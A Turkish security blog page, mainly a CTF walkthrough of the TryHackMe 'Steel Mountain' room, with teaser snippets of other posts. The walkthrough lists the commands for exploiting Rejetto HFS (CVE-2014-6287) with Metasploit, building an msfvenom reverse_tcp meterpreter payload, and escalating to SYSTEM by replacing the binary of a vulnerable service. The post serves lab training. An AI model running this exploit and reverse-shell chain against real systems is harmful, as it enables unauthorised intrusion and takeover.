Nedir?

SIEM (Security Information and Event Management) Nedir, Nasıl Çalışır?

  SIEM (Security Information and Event Management) veya Güvenlik Bilgi ve Olay Yönetimi, Güvenlik Olay Yönetimi (Security Event Management / SEM) ve Güvenlik Bilgi Yönetimi (Security Information Management / SIM) entegrasyonunu bir araya getirerek çeşitli güvenlik araçlarından veriler toplar, analiz eder ve sunar. Potansiyel güvenlik tehditlerini ve zayıflıkları etkili bir şekilde ele alır. Bu güvenlik çözümü, 2005 yılında ilk olarak önerildiğinden bu yana önemli ölçüde evrim geçirmiş olup, tehdit tespiti, inceleme ve yanıt süresini artırmak için yapay zeka ve makine öğrenimi gibi ileri teknolojileri içerir. Günümüzdeki güvenlik operasyon merkezlerinde (Security Operation Center / SOC) SIEM’in rolü, güvenlik, izleme ve uyumluluk

22 Nisan 2024
CTF Çözümleri

Tryhackme:Junior Security Analyst Intro

  Herkese merhaba. Bugün TryHackMe’de bulunan “Junior Security Analyst Intro” odasının çözümünü yapacağız Task 1  A career as a Junior (Associate) Security Analyst Bir Junior Güvenlik Analisti olarak görev yapacak olan  Triage Specialist, logları ve uyarıları izlemek veya incelemekle sorumlu olacaktır. Bu roldeki görevler arasında uyarıların izlenmesi ve araştırılması, güvenlik araçlarının yapılandırılması ve yönetimi, temel IDS imzalarının geliştirilmesi ve uygulanması, SOC çalışma gruplarına katılma ve bilet oluşturma yer almaktadır. Ayrıca, güvenlik olayları varsa bunların Kademe 2’ye ve Ekip Liderine iletilmesi gerekmektedir. Bu rol için 0-2 yıl deneyim gereklidir ve ağ, işletim sistemleri ve web uygulamaları hakkında temel bilgiye sahip olunması

22 Nisan 2024
Nasıl Yapılır

Bilgisayara İşletim Sistemi Yüklemeden Kali Linux Çalıştırmak

Merhaba arkadaşlar; Bugün sizlere bilgisayarımızda hali hazırda kurulu bir windows işletim sistemi varken nasıl bu kuruluma dokunmadan kali linux açabileceğimizi anlatacağım. Öncelikle bize bir usb flash bellek ve halihazırda windows kurulu olan bir pc gerekiyor. Flash diskimizi biçimlendiriyoruz.Nasıl biçimlendireceğim derseniz bu işlerin kuralı biraz da araştırmaktan geçiyor.Bu basit işlemi size anlatmak yerine youtube’a yönlendireceğim. Gelelim şimdi kali linux iso dosyasını ilk olarak indirmeye. Google’da kali linux diye arattıktan sonra kali.org seçeneğinin altındaki download yazısına tıklıyoruz.Daha sonra live boot dediğimiz kısıma geliyoruz. Live boot a tıkladıktan sonra karşımıza 3 tane seçenek çıkacaktır. Biz kali.org’un önerdiği point relase olan iso dosyasını bilgisayarımıza

22 Nisan 2024
ISO 27001 Bilgi Güvenliği Yönetim Sistemi
Nedir?

ISO 27001 Nedir?

Merhabalar, bu yazımda siz değerli okurlarımla ISO 27001’in genel çerçevede ne olduğu ve önemini paylaşmaya çalışacağım. Şimdiden iyi okumalar dilerim. ISO 27001 Nedir? Bilgi, bir kurumun ve/veya kuruluşun en değerli malvarlığıdır. Bilginin kurum ve/veya kuruluşun içerisinde güvenli bir şekilde tutulması ve saklanması da bu malvarlığının sigortasıdır. Hal böyleyken kurumların ve kuruluşların bilgilerini nasıl güvenli bir şekilde göndereceğini, bilgilerini nasıl güvenli bir şekilde saklayacağını ve bilgiyi hangi prosedürlerde güvenli bir şekilde işleyeceğinin uluslararası standartlarda belirlenmesi gerekmektedir. Bu aşamada ISO 27001 devreye girmektedir. ISO 27001 Bilgi Güvenliği Yönetim Sistemi (BGYS), kurumsal bilgi güvenliğinin sağlanmasında insanları, süreçleri ve bilgi sistemlerini içine alan ve

19 Nisan 2024
CTF Çözümleri, Haberler

Windows Sunucu Analizi – TryHackMe(Investigating Windows)

Bu yazımda, TryHackMe’deki ‘Investigating Windows’ odasında bulunan Windows Sunucu Analizi’ni gerçekleştireceğim. Odada bulunan ilk sorudan analizime başlıyorum. 1.Soru Windows makinesinin sürümü ve yılı nedir? İlk olarak makinemde arama bölümünde cmd yazarak komut satırını çalıştırıyorum.”systeminfo” komutunu girdikten sonra temel sistem bilgisi karşımıza gelecek versiyon bilgisi ve yılını görebileceğiz. Böylelikle ilk sorumuz cevabını bulmuş oluyoruz. Soru 1 cevabı: Windows Server 2016 2. Soru: En son hangi kullanıcı giriş yaptı? Bu soru için ilk olarak “net users” komutu kullanacağız. Burada kullanıcıları görebiliyoruz. En son giriş yapan kullanıcının Administrator olduğunu tespit ediyoruz. “net users administrator” komutu ile de en son giriş yapan kullanıcının administrator

6 Şubat 2024
Haberler, Nasıl Yapılır, Nedir?

Lets Defend | SOC145 – Ransomware Detected Alarm Analizi

Bu yazımda LetsDefend sitesinde bulunan SOC145 – Ransomware Detected Alarmını analiz edeceğim. Olay Kimliği (EventID): 92 Bu olayın benzersiz kimliği. Olay Zamanı: 23 Mayıs 2021, 19:32 Olayın gerçekleştiği zaman damgası. Kural: SOC145-Ransomware Algılandı Bu olay için tetiklenen kural, SOC’un önceden tanımlanmış bir kurala göre fidye yazılımını algılamaya çalıştığını gösterir. Seviye: Güvenlik Analisti Olayın seviyesi, bu olayın Güvenlik Analisti seviyesinde olduğunu gösterir. Bu, olayın daha fazla inceleme için bir güvenlik analisti tarafından dikkate alınması gerekebileceğini gösterir. Kaynak Adresi: 172.16.17.88 Olayın kaynağı olan IP adresi. Kaynak Host Adı: MarkPRD IP adresi ile ilişkilendirilmiş olan ana bilgisayar adı. Dosya Adı: ab.exe Olayla ilgili

2 Ocak 2024
CTF Çözümleri

CTF : TryHackMe Wireshark: The Basics

Herkese merhaba. Bugün TryHackme’de bulunan “Wireshark: The Basics” odasının çözümünü inceleyeceğiz. Görev 1 – Giriş 1-Ekran görüntülerini simüle etmek için hangi dosya kullanılır? cevap : http1.pcapng 2-Soruları cevaplamak için hangi dosya kullanılır? cevap : Exercise.pcapng Görev 2 – Araca Genel Bakış Wireshark üzerinde yakalama dosyası yorumlarını okuma kısmı Statistics sekmesi üzerinde Capture File Properties içerisinde bulunur. Capture File Properties içerisine girdiğimizde bizleri görev 2’de bulunan 3 sorunun cevapları karşılıyor. 1-“Yakalama dosyası yorumlarını” okuyun. Bayrak nedir? cevap : TryHackMe_Wireshark_Demo 2-Toplam paket sayısı nedir? cevap : 58620 3- Yakalama dosyasının SHA256 karma değeri nedir? cevap : f446de335565fb0b0ee5e5a3266703c778b2f3dfad7efeaeccb2da5641a6d6eb Görev 3 – Paket Diseksiyonu

31 Ekim 2023
CTF Çözümleri

CTF : TryHackMe Hacker vs. Hacker

Herkese merhaba. Bugün TryHackMe’de bulunan “Hacker vs. Hacker” odasının çözümünü inceleyeceğiz. TryHackMe oda linki : https://tryhackme.com/room/hackervshacker Hazırsanız, hadi başlıyalım. İlk olarak Openvpn bağlantınızın bağlı olduğunu kontrol ediyoruz ve odayı başlatarak hedef makinenin ip adresini alıyoruz. Odanın erişebilir olduğunu kontrol etmek için cmd komut satırı üzerinden “ping makinenın_ip_adresi” ping komutu ile test ediyoruz. Artık başlayabiliriz. İlk adım olarak makinanın hangi portlarının açık olduğunu öğrenmemiz gerekiyor. Hangi portlar aktif ise ona göre bir saldırı gerçekleştireceğiz. Port tarama konusunda birden fazla araç mevcut. Biz bu araçların içinde en çok kullanılan NMAP aracını kullanacağız. Komut : nmap -sS -sC -sV hedef_makinenin_ip_adresi Komut içerisinde kullanmış

12 Ekim 2023
CTF Çözümleri

CTF : TryHackMe Brute It

Herkese merhaba. Bugün TryHackMe’de bulunan “Brute It” odasının çözümünü inceleyeceğiz. TryHackMe oda linki : https://tryhackme.com/room/bruteit Hazırsan, hadi başlayalım. İlk olarak Openvpn bağlantınızın bağlı olduğunu kontrol etmeyi ihmal etme ve odayı başlatarak makinanın ip adresini alıyoruz. Odanın erişebilir olduğunu kontrol etmek için cmd komut satırı üzerinden “ping makinenın_ip_adresi” ping komutu ile test ediyoruz. Artık başlayabiliriz. İlk adım olarak makinanın hangi portlarının açık olduğunu öğrenmemiz gerekiyor. Hangi portlar aktif ise ona göre saldırı gerçekleştireceğiz. Port tarama konusunda birden fazla araç mevcut. Biz bu araçların içinde en çok kullanılan NMAP aracını kullanacağız. Komut : nmap -sS -sC -sV makinenin_ip_adresi Komut içerisinde kullanmış olduğumuz -sS daha

3 Ekim 2023
CTF Çözümleri

CTF : TryHackMe Year of the Rabbit

Herkese merhaba. Bugün TryHackMe’de bulunan “Year of the Rabbit” odasının çözümünü inceleyeceğiz. TryHackMe oda linki : https://tryhackme.com/room/yearoftherabbit Hazırsan, hadi başlayalım. İlk olarak Openvpn bağlantınızın bağlı olduğunu kontrol et ve odayı başlatarak makinanın ip adresini al. Odanın erişebilir olduğunu kontrol etmek için cmd komut satırı üzerinden “ping makinenın_ip_adresi” ping komutu ile test et. Artık başlayabiliriz. İlk adım olarak makinanın hangi portlarının açık olduğunu öğrenmemiz gerekiyor. Hangi portlar aktif ise ona göre saldırı gerçekleştireceğiz. Port tarama konusunda birden fazla araç mevcut. Biz bu araçların içinde en çok kullanılan NMAP aracını kullanacağız. Komut : nmap -sS -sV -sC -Pn -T5 makinenin_ip_adresi Komut içerisinde

29 Eylül 2023
Home
CTF: TryHackMe Steel Mountain Çözümü [VIP]
CTF Çözümleri

CTF: TryHackMe Steel Mountain Çözümü [VIP]

By  On 15 Nisan 2021 Yorum yapılmamış

Merhaba, bu yazıda Tryhackme’de bulunan Steel Mountain makinesinin çözümünü inceleyeceğiz. Openvpn bağlantısı ile ilgili bilgi almak istiyorsanız Tryhackme CTF’deki ilk yazımızı okuyabilirsiniz. Bağlantı sağlandıktan sonra Tryhackme’de bulunan makine deploy edilir ve makinenin ip adresi öğrenilir. Bu çözümde kullandığım ip adresi 10.10.174.85 olarak belirlendi. Artık bilgi toplama aşamasına geçilebilir.

sudo nmap -A -T4 10.10.174.85 ile nmap taraması yapıldığında 80 ve 8080 http, 135, 139, 445, 3389, 49152, 49153, 49154, 49155, 49156 portunun açık olduğu görülüyor.

İlk soruda ayın elemanının kim olduğu soruluyor.

http://10.10.174.85:80 adresine gidilir.

Sağ tık, View Page Source dedikten sonra sayfa kaynağı açılır. Burada görselin adı gözüküyor ve böylelikle ilk soru cevaplanmış oldu.

Bir sonraki soruda web sunucusunun çalıştığı diğer port soruluyor. Nmap taraması ile diğer http portunun 8080 olduğu biliniyor. http://10.10.174.85:8080 gidildiğinde http file server ile karşılaşılıyor.

sudo nmap -A –script vuln -T4 10.10.174.85 ile tarama yapılarak HFS 2.3’nin zafiyet barındırdığı bulunabilir. Fakat TryHackMe’deki sorusunda kastedilen exploit CVE-2011-3192 değil.

HFS 2.3 google’da aratıldığında HTTP File Server tam adının Rejetto HTTP File Server olduğu görülüyor ve ilk çıkan sonuçta güncel exploit, exploit-db sitesinde gözüküyor.

Exploit’in adının CVE-2014-6287 olduğu öğreniliyor.

Böylelikle Task 2’nun ilk 3 sorusu cevaplanmış oluyor.

Bu exploiti kullanmak için msfconsole -q komutu ile metasploit başlatılır.

search cve-2014-6287 ile exploit aratılır.

use 0 ile exploit kullanıma hazır hale getirilir.

show options ile düzenlenmesi gereken konfigürasyonlar görüntülenir.

set RHOSTS 10.10.174.85 hedef ip belirlenir.

set RPORT 8080 hedef port belirlenir.

set SRVHOST <local_ip> local ip belirlenir.

set LHOST <local_ip> payload’ın local ip’si belirlenir.

exploit komutuyla exploit aktif edilir.

cd c:/users/bill/desktop

cat user.txt ile user flag bulunur.

TryHackMe root yetkisi elde edilmesi için PowerUp ile bir sistem taraması yapılması öneriyor.

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 komutuyla github’dan PowerUp.ps1 indirilir.

Meterpreter komut satırına dönülür.

upload /home/kali/Downloads/PowerUp.ps1 local makinemizden hedef makineye PowerUp scripti yüklenir.

load powershell ile powershell yüklenir

powershell_shell komutuyla powershell taraması aktif hale getirilir. Çok kısa süre içerisinde AdvancedSystemCare9 programının istismar edilebileceği saptanıyor.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=4443 -f exe -o Advanced.exe msfvenom aracılığıyla yerel makinede localhost ve localport belirlenerek oluşturulan Advanced.exe adında bir reverse_tcp payload oluşturulur.



cd "C:\Program Files (x86)\IObit" hedef dizine gidilir.

upload /home/kali/Advanced.exe ile payload'ın olduğu zararlı program local makineden hedef makineye yüklenir.



background komutu ile metasploit'e dönülür.

use exploit/multi/handler ile kullanılan payload değiştirilir.

set LHOST <local_ip> local ip belirlenir.

set LPORT 4443 ile locap port belirlenir.

run -j ile payload çalıştırılır.



sessions -i 1 daha önce açılan oturuma gidilir.

shell payload çalıştırılır.

sc stop AdvancedSystemCareService9 çalışan Advanced servisi durdurulur.

sc start AdvancedSystemCareService9 servis yeniden çalıştırıldığında payload aktif olur ve yeni meterpreter 

oturumu oluşur.



sessions -i 2 yeni oturuma bağlanılır.


cd c:/users/administrator/desktop


cat root.txt ile root flag bulunur.
Tags:

Related Posts

About The Author

Taha

Reply